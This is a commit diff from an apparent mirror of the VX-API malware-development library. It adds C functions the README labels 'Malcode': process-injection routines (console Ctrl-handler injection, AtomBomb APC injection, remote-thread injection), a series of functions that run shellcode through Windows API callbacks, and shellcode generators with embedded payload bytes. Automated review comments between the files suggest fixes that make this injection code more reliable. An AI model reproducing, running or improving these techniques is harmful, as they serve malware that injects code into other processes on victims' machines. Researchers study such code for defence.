mirror of https://github.com/vxunderground/VX-API
parent
0f0f9aab4c
commit
c91d3da65e
35
README.md
35
README.md
|
@ -3,7 +3,7 @@ managed by [vx-underground](https://vx-underground.org) | follow us on [Twitter]
|
|||
|
||||
# VX-API
|
||||
|
||||
Version: 2.0.513
|
||||
Version: 2.0.559
|
||||
|
||||
Developer: smelly__vx
|
||||
|
||||
|
@ -156,12 +156,41 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| MpfGetLsaPidFromServiceManager | modexp | Malcode |
|
||||
| MpfGetLsaPidFromRegistry | modexp | Malcode |
|
||||
| MpfGetLsaPidFromNamedPipe | modexp | Malcode |
|
||||
| ShellcodeExecutionViaFunctionCallbackMain | alfarom256, aahmad097| Malcode |
|
||||
| ProcessInjectionMain | SafeBreach Labs | Malcode |
|
||||
| MpfSceViaEnumChildWindows | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaCDefFolderMenu_Create2 | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaCertEnumSystemStore | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaCertEnumSystemStoreLocation | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumDateFormatsW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumDesktopWindows | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumDesktopsW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumDirTreeW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumDisplayMonitors | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumFontFamiliesExW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumFontsW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumLanguageGroupLocalesW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumObjects | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumResourceTypesExW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumSystemCodePagesW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumSystemGeoID | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumSystemLanguageGroupsW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumSystemLocalesEx | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumThreadWindows | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumTimeFormatsEx | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumUILanguagesW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumWindowStationsW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumWindows | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumerateLoadedModules64 | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaK32EnumPageFilesW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumPwrSchemes | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaMessageBoxIndirectW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfComMonitorChromeSessionOnce | smelly__vx | Malcode |
|
||||
| MpfExecute64bitPeBinaryInMemoryFromByteArrayNoReloc | aaaddress1 | Malcode |
|
||||
| MpfLolExecuteRemoteBinaryByAppInstaller | Wade Hickey | Malcode |
|
||||
| MpfExtractMaliciousPayloadFromZipFileNoPassword | Codu | Malcode |
|
||||
| MpfPiControlInjection | SafeBreach Labs | Malcode |
|
||||
| MpfPiQueueUserAPCViaAtomBomb | SafeBreach Labs | Malcode |
|
||||
| MpfPiWriteProcessMemoryCreateRemoteThread | SafeBreach Labs | Malcode |
|
||||
| MpfProcessInjectionViaProcessReflection | Deep Instinct | Malcode |
|
||||
| UrlDownloadToFileSynchronous | Hans Passant | Networking |
|
||||
| ConvertIPv4IpAddressStructureToString | smelly__vx | Networking |
|
||||
| ConvertIPv4StringToUnsignedLong | smelly__vx | Networking |
|
||||
|
|
|
@ -2,28 +2,16 @@
|
|||
|
||||
INT main(VOID)
|
||||
{
|
||||
DWORD dwError = ERROR_SUCCESS;
|
||||
PBYTE Buffer = NULL;
|
||||
PCHAR Buffer = NULL;
|
||||
DWORD dwSize = 0;
|
||||
|
||||
/*SHELLCODE_EXECUTION_INFORMATION Sei = { 0 };
|
||||
Sei.Payload = (LPBYTE)GenericShellcodeOpenCalcExitThread();
|
||||
Sei.dwLengthOfPayloadInBytes = 277;
|
||||
Sei.MethodEnum = E_ENUMDESKTOPSW;
|
||||
DWORD dwX = 0;*/
|
||||
|
||||
PROCESS_INJECTION_INFORMATION Pii = { 0 };
|
||||
Buffer = GenericShellcodeHelloWorldMessageBoxA(&dwSize);
|
||||
|
||||
Pii.Payload = (LPBYTE)GenericShellcodeHelloWorldMessageBoxAEbFbLoop();
|
||||
Pii.dwLengthOfPayloadInBytes = 70;
|
||||
Pii.ProcessId = 33176;
|
||||
Pii.ThreadId = 18600;
|
||||
Pii.MethodEnum = E_QUEUE_USER_APC;
|
||||
MpfSceViaMessageBoxIndirectW((PBYTE)Buffer, dwSize);
|
||||
|
||||
//ShellcodeExecutionViaFunctionCallbackMain(&Sei);
|
||||
//ProcessInjectionMain(&Pii);
|
||||
if (Buffer)
|
||||
HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, Buffer);
|
||||
|
||||
MpfExtractMaliciousPayloadFromZipFileW((PWCHAR)L"C:\\Users\\dwThr\\Desktop\\Test.zip", (PWCHAR)L"C:\\Users\\dwThr\\Desktop\\");
|
||||
|
||||
return dwError;
|
||||
return ERROR_SUCCESS;
|
||||
}
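Review bot: `HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, Buffer)` passes an allocation flag to HeapFree; the only flag HeapFree recognises is `HEAP_NO_SERIALIZE`, so this should read `HeapFree(GetProcessHeapFromTeb(), 0, Buffer);`. `Buffer`, as returned by `GenericShellcodeHelloWorldMessageBoxA(&dwSize)`, is also handed straight to `MpfSceViaMessageBoxIndirectW` without a NULL check, so an allocation failure inside the helper dereferences NULL instead of failing cleanly; a guard such as `if (Buffer == NULL) return ERROR_OUTOFMEMORY;` before the call would cover it. Which of the `Pii.*` lines and the `C:\\Users\\dwThr\\Desktop\\...` strings survive on the new side is not recoverable from this rendering; if they do, a developer-specific absolute path and hardcoded process/thread IDs are being committed in the demo driver and should come from `argv` or be marked as placeholders.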
|
||||
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
PCHAR GenericShellcodeHelloWorldMessageBoxA(VOID)
|
||||
PCHAR GenericShellcodeHelloWorldMessageBoxA(_Out_ PDWORD SizeOfShellcodeInBytes)
|
||||
{
|
||||
UCHAR RawPayloadBuffer[] =
|
||||
"\x48\xB8\x44\x44\x44\x44\x44\x44\x44\x44\x50\x48\xB8"
|
||||
|
@ -28,10 +28,12 @@ PCHAR GenericShellcodeHelloWorldMessageBoxA(VOID)
|
|||
CopyMemory(MemoryFindMemory(Payload, RawBufferSize, (PCHAR)&OffsetCaption, 8), Caption, 8);
|
||||
CopyMemory(MemoryFindMemory(Payload, RawBufferSize, (PCHAR)&OffsetFunction, 8), &FunctionPointer, 8);
|
||||
|
||||
*SizeOfShellcodeInBytes = RawBufferSize;
|
||||
|
||||
return Payload;
|
||||
}
|
||||
|
||||
PCHAR GenericShellcodeHelloWorldMessageBoxAEbFbLoop(VOID)
|
||||
PCHAR GenericShellcodeHelloWorldMessageBoxAEbFbLoop(_Out_ PDWORD SizeOfShellcodeInBytes)
|
||||
{
|
||||
UCHAR RawPayloadBuffer[] =
|
||||
"\x48\xB8\x44\x44\x44\x44\x44\x44\x44\x44\x50\x48\xB8"
|
||||
|
@ -59,10 +61,12 @@ PCHAR GenericShellcodeHelloWorldMessageBoxAEbFbLoop(VOID)
|
|||
CopyMemory(MemoryFindMemory(Payload, RawBufferSize, (PCHAR)&OffsetCaption, 8), Caption, 8);
|
||||
CopyMemory(MemoryFindMemory(Payload, RawBufferSize, (PCHAR)&OffsetFunction, 8), &FunctionPointer, 8);
|
||||
|
||||
*SizeOfShellcodeInBytes = RawBufferSize;
|
||||
|
||||
return Payload;
|
||||
}
|
||||
|
||||
PCHAR GenericShellcodeOpenCalcExitThread(VOID)
|
||||
PCHAR GenericShellcodeOpenCalcExitThread(_Out_ PDWORD SizeOfShellcodeInBytes)
|
||||
{
|
||||
//msfvenom -p windows/x64/exec EXITFUNC=thread CMD=calc.exe -f c -a x64
|
||||
//Length = 277
|
||||
|
@ -98,5 +102,7 @@ PCHAR GenericShellcodeOpenCalcExitThread(VOID)
|
|||
|
||||
CopyMemory(Payload, RawPayloadBuffer, RawBufferSize);
|
||||
|
||||
*SizeOfShellcodeInBytes = RawBufferSize;
|
||||
|
||||
return Payload;
|
||||
}
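Review bot: `*SizeOfShellcodeInBytes = RawBufferSize;` in each of the three hunks dereferences the new `_Out_` parameter unconditionally, so a caller passing NULL crashes; either guard it with `if (SizeOfShellcodeInBytes) *SizeOfShellcodeInBytes = RawBufferSize;` or add a header comment on each function stating that the parameter is required and receives the byte length of the returned heap buffer. The bodies of all three functions begin outside the hunks, so whether earlier return paths leave the out-value unset cannot be confirmed here; a comment saying the out-value is only valid when the return is non-NULL would settle it for callers. The `//Length = 277` comment in `GenericShellcodeOpenCalcExitThread` is now a second, hand-maintained source of the size and is likely to drift from `RawBufferSize`.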
|
|
@ -0,0 +1,121 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL MpfPiControlInjection(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes, _In_ DWORD TargetProcessId)
|
||||
{
|
||||
typedef NTSTATUS(NTAPI* RTLENCODEREMOTEPOINTER)(HANDLE, PVOID, PVOID*);
|
||||
RTLENCODEREMOTEPOINTER RtlEncodeRemotePointer = NULL;
|
||||
HMODULE hNtdll = NULL;
|
||||
HMODULE hKernelbase = NULL;
|
||||
MODULEINFO KernelbaseInformation = { 0 };
|
||||
PCHAR KernelBaseDefaultHandler = NULL;
|
||||
PCHAR KernelBaseSingleHandler = NULL;
|
||||
DWORD64 Encoded = 0;
|
||||
DWORD ConsoleAttachList[2] = { 0 };
|
||||
DWORD ParentId = 0;
|
||||
HWND hWindow = NULL;
|
||||
PVOID EncodedAddress = NULL;
|
||||
HANDLE hHandle = NULL;
|
||||
LPVOID BaseAddress = NULL;
|
||||
INPUT Input = { 0 };
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
hNtdll = GetModuleHandleEx2W(L"ntdll.dll");
|
||||
hKernelbase = GetModuleHandleEx2W(L"kernelbase.dll");
|
||||
|
||||
if (!hNtdll || !hKernelbase)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
RtlEncodeRemotePointer = (RTLENCODEREMOTEPOINTER)GetProcAddressA((DWORD64)hNtdll, "RtlEncodeRemotePointer");
|
||||
if (!RtlEncodeRemotePointer)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!K32GetModuleInformation(InlineGetCurrentProcess, hKernelbase, &KernelbaseInformation, sizeof(KernelbaseInformation)))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
KernelBaseDefaultHandler = (PCHAR)MemoryFindMemory(hKernelbase, KernelbaseInformation.SizeOfImage, (PVOID)"\x48\x83\xec\x28\xb9\x3a\x01\x00\xc0", 9);
|
||||
if (KernelBaseDefaultHandler == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Encoded = (DWORD64)EncodePointer(KernelBaseDefaultHandler);
|
||||
if (Encoded == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
KernelBaseSingleHandler = (PCHAR)MemoryFindMemory(hKernelbase, KernelbaseInformation.SizeOfImage, &Encoded, 8);
|
||||
if (KernelBaseSingleHandler == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (GetConsoleProcessList(ConsoleAttachList, 2) < 2)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (ConsoleAttachList[0] != GetCurrentProcessIdFromTeb())
|
||||
ParentId = ConsoleAttachList[0];
|
||||
else
|
||||
ParentId = ConsoleAttachList[1];
|
||||
|
||||
FreeConsole();
|
||||
AttachConsole(TargetProcessId);
|
||||
|
||||
hWindow = GetConsoleWindow();
|
||||
|
||||
FreeConsole();
|
||||
AttachConsole(ParentId);
|
||||
|
||||
hHandle = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE, TargetProcessId);
|
||||
|
||||
BaseAddress = VirtualAllocEx(hHandle, NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BaseAddress == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!WriteProcessMemory(hHandle, BaseAddress, Payload, PayloadSizeInBytes, NULL))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
CloseHandle(hHandle);
|
||||
|
||||
hHandle = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE, TargetProcessId);
|
||||
if (hHandle == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
RtlEncodeRemotePointer(hHandle, BaseAddress, &EncodedAddress);
|
||||
|
||||
if (!WriteProcessMemory(hHandle, KernelBaseSingleHandler, &EncodedAddress, 8, NULL))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Input.type = INPUT_KEYBOARD;
|
||||
Input.ki.wScan = 0;
|
||||
Input.ki.time = 0;
|
||||
Input.ki.dwExtraInfo = 0;
|
||||
Input.ki.wVk = VK_CONTROL;
|
||||
Input.ki.dwFlags = 0; // 0 for key press
|
||||
|
||||
SendInput(1, &Input, sizeof(INPUT));
|
||||
Sleep(100);
|
||||
|
||||
PostMessageA(hWindow, WM_KEYDOWN, 'C', 0);
|
||||
|
||||
Sleep(100);
|
||||
|
||||
Input.type = INPUT_KEYBOARD;
|
||||
Input.ki.wScan = 0;
|
||||
Input.ki.time = 0;
|
||||
Input.ki.dwExtraInfo = 0;
|
||||
Input.ki.wVk = VK_CONTROL;
|
||||
Input.ki.dwFlags = KEYEVENTF_KEYUP;
|
||||
SendInput(1, &Input, sizeof(INPUT));
|
||||
|
||||
RtlEncodeRemotePointer(hHandle, KernelBaseDefaultHandler, &EncodedAddress);
|
||||
|
||||
if (!WriteProcessMemory(hHandle, KernelBaseSingleHandler, &EncodedAddress, 8, NULL))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (Payload)
|
||||
HeapFree(GetProcessHeap(), HEAP_ZERO_MEMORY, Payload);
|
||||
|
||||
if (hHandle)
|
||||
CloseHandle(hHandle);
|
||||
|
||||
return bFlag;
|
||||
}
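Review bot: `EXIT_ROUTINE` unconditionally frees the caller's `Payload` with `HeapFree(GetProcessHeap(), HEAP_ZERO_MEMORY, Payload)`, so `MpfPiControlInjection` silently takes ownership of a buffer it did not allocate, unlike its siblings `MpfPiQueueUserAPCViaAtomBomb` and `MpfPiWriteProcessMemoryCreateRemoteThread`, which leave `Payload` to the caller; a caller that reuses the buffer or passes stack or static memory gets a double free or heap corruption. Either drop the free or state the contract in a header comment, e.g. `// Takes ownership of Payload, which must come from GetProcessHeap(); it is freed on every path.` `HEAP_ZERO_MEMORY` is an allocation flag with no meaning to HeapFree (only `HEAP_NO_SERIALIZE` is accepted), so pass `0` there.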
|
|
@ -0,0 +1,69 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL MpfPiQueueUserAPCViaAtomBomb(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes, _In_ DWORD TargetThreadId)
|
||||
{
|
||||
HANDLE hHandle = NULL;
|
||||
LPVOID BaseAddress = NULL;
|
||||
HANDLE hThread = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
NTQUEUEAPCTHREAD NtQueueApcThread = NULL;
|
||||
HMODULE hModule = NULL;
|
||||
ATOM Alpha = ERROR_SUCCESS, Bravo = ERROR_SUCCESS;
|
||||
PCHAR pPayload = (PCHAR)Payload;
|
||||
|
||||
hModule = GetModuleHandleEx2W(L"ntdll.dll");
|
||||
if (hModule == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
NtQueueApcThread = (NTQUEUEAPCTHREAD)GetProcAddressA((DWORD64)hModule, "NtQueueApcThread");
|
||||
if (!NtQueueApcThread)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
hThread = OpenThread(THREAD_SET_CONTEXT | THREAD_QUERY_INFORMATION, FALSE, TargetThreadId);
|
||||
if (hThread == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
hHandle = OpenProcess(0x001fffff, FALSE, GetProcessIdOfThread(hThread));
|
||||
if (hHandle == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
BaseAddress = VirtualAllocEx(hHandle, NULL, PayloadSizeInBytes, 0x00003000, 0x00000040);
|
||||
if (BaseAddress == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Bravo = GlobalAddAtomA("b");
|
||||
if (Bravo == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (pPayload[0] == '\0')
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
for (DWORD64 Position = PayloadSizeInBytes - 1; Position > 0; Position--)
|
||||
{
|
||||
if ((pPayload[Position] == '\0') && (pPayload[Position - 1] == '\0'))
|
||||
NtQueueApcThread(hThread, GlobalGetAtomNameA, (PVOID)Bravo, (PVOID)(((DWORD64)BaseAddress) + Position - 1), (PVOID)2);
|
||||
}
|
||||
|
||||
for (PCHAR Position = pPayload; Position < (pPayload + PayloadSizeInBytes); Position += strlen(Position) + 1)
|
||||
{
|
||||
if (*Position == '\0')
|
||||
continue;
|
||||
|
||||
Alpha = GlobalAddAtomA(Position);
|
||||
if (Alpha == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
NtQueueApcThread(hThread, GlobalGetAtomNameA, (PVOID)Alpha, (PVOID)(((DWORD64)BaseAddress) + (Position - pPayload)), (PVOID)(StringLengthA(Position) + 1));
|
||||
}
|
||||
|
||||
QueueUserAPC((PAPCFUNC)BaseAddress, hThread, 0);
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hThread)
|
||||
CloseHandle(hThread);
|
||||
|
||||
return bFlag;
|
||||
}
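Review bot: the process handle `hHandle` opened by `OpenProcess(0x001fffff, ...)` is never closed — `EXIT_ROUTINE` only closes `hThread` — so every call leaks a full-access process handle; add `if (hHandle) CloseHandle(hHandle);` next to the thread close. The raw constants `0x001fffff`, `0x00003000` and `0x00000040` are the values the sibling `MpfPiWriteProcessMemoryCreateRemoteThread` already spells as `PROCESS_ALL_ACCESS`, `MEM_COMMIT` (here `MEM_COMMIT | MEM_RESERVE`) and `PAGE_EXECUTE_READWRITE`; use the names for consistency. `ATOM Alpha = ERROR_SUCCESS, Bravo = ERROR_SUCCESS;` initialises atoms with a Win32 error code — `0`, the failure value the code later compares against, says what is meant. The two loops compute the same length once with `strlen(Position)` and once with `StringLengthA(Position)`; pick one.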
|
|
@ -0,0 +1,40 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL MpfPiWriteProcessMemoryCreateRemoteThread(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes, _In_ DWORD TargetProcessId)
|
||||
{
|
||||
HANDLE hHandle = NULL, hThread = NULL;
|
||||
LPVOID BaseAddress = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
hHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, TargetProcessId);
|
||||
if (hHandle == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
BaseAddress = VirtualAllocEx(hHandle, NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BaseAddress == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!SetProcessPrivilegeToken(0))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!WriteProcessMemory(hHandle, BaseAddress, Payload, PayloadSizeInBytes, NULL))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
hThread = CreateRemoteThread(hHandle, NULL, 0, (LPTHREAD_START_ROUTINE)BaseAddress, NULL, 0, NULL);
|
||||
if (hThread == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
WaitForSingleObject(hThread, INFINITE);
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hThread)
|
||||
CloseHandle(hThread);
|
||||
|
||||
if (hHandle)
|
||||
CloseHandle(hHandle);
|
||||
|
||||
return bFlag;
|
||||
}
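Review bot: `MpfPiWriteProcessMemoryCreateRemoteThread` blocks the caller indefinitely on `WaitForSingleObject(hThread, INFINITE)` and discards the wait result, neither of which the signature conveys; a header comment such as `// Blocks until the remote thread exits; the wait result is not checked.` would tell callers what to expect, and a timeout parameter could be considered later. The literal `0` passed to `SetProcessPrivilegeToken(0)` is an unexplained magic argument — name the privilege it selects in a comment, or via a constant if the project defines one.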
|
|
@ -0,0 +1,22 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeCDefFolderMenu_Create2ThreadCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
IContextMenu* ContextMenuRequired = NULL;
|
||||
CDefFolderMenu_Create2(NULL, NULL, 0, NULL, NULL, (LPFNDFMCALLBACK)lpParameter, 0, NULL, &ContextMenuRequired);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaCDefFolderMenu_Create2(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeCDefFolderMenu_Create2ThreadCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
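Review bot: `InvokeCDefFolderMenu_Create2ThreadCallbackRoutine` is declared `VOID (LPVOID)` but is cast to `LPTHREAD_START_ROUTINE`, whose type is `DWORD WINAPI (LPVOID)`; calling through an incompatible function-pointer type is undefined behaviour in C even where the x64 calling convention happens to tolerate it, so declare it `DWORD WINAPI InvokeCDefFolderMenu_Create2ThreadCallbackRoutine(LPVOID lpParameter)` and end it with `return 0;`. Every `Invoke*CallbackRoutine` in the `MpfSceVia*` sections that follow has the same declaration/cast mismatch and should be changed the same way. In `MpfSceViaCDefFolderMenu_Create2` the result of `CreateThreadAndWaitForCompletion` is discarded and `BinAddress` is never released with `VirtualFree`, so `TRUE` is returned whether or not the thread ran; the `IContextMenu*` that `CDefFolderMenu_Create2` may hand back is likewise never `Release()`d.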
|
|
@ -0,0 +1,23 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
//CertEnumSystemStore
|
||||
|
||||
VOID InvokeCertEnumSystemStoreThreadCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
CertEnumSystemStore(CERT_SYSTEM_STORE_CURRENT_USER, NULL, NULL, (PFN_CERT_ENUM_SYSTEM_STORE)lpParameter);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaCertEnumSystemStore(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeCertEnumSystemStoreThreadCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeCertEnumSystemStoreLocationThreadCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
CertEnumSystemStoreLocation(NULL, NULL, (PFN_CERT_ENUM_SYSTEM_STORE_LOCATION)lpParameter);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaCertEnumSystemStoreLocation(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeCertEnumSystemStoreLocationThreadCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumChildWindowsThreadCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
EnumChildWindows(NULL, (WNDENUMPROC)lpParameter, NULL);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumChildWindows(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumChildWindowsThreadCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumDateFormatsWThreadCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
EnumDateFormatsW((DATEFMT_ENUMPROCW)lpParameter, LOCALE_SYSTEM_DEFAULT, 0);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumDateFormatsW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumDateFormatsWThreadCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumDesktopWindowsThreadCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
EnumDesktopWindows(GetThreadDesktop(GetCurrentThreadId()), (WNDENUMPROC)lpParameter, NULL);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumDesktopWindows(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumDesktopWindowsThreadCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumDesktopsWThreadCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
EnumDesktopsW(GetProcessWindowStation(), (DESKTOPENUMPROCW)lpParameter, NULL);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumDesktopsW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumDesktopsWThreadCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,28 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumDirTreeWThreadCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
WCHAR DisposeableBuffer[512] = { 0 };
|
||||
|
||||
if (!SymInitialize(InlineGetCurrentProcess, NULL, TRUE))
|
||||
return;
|
||||
|
||||
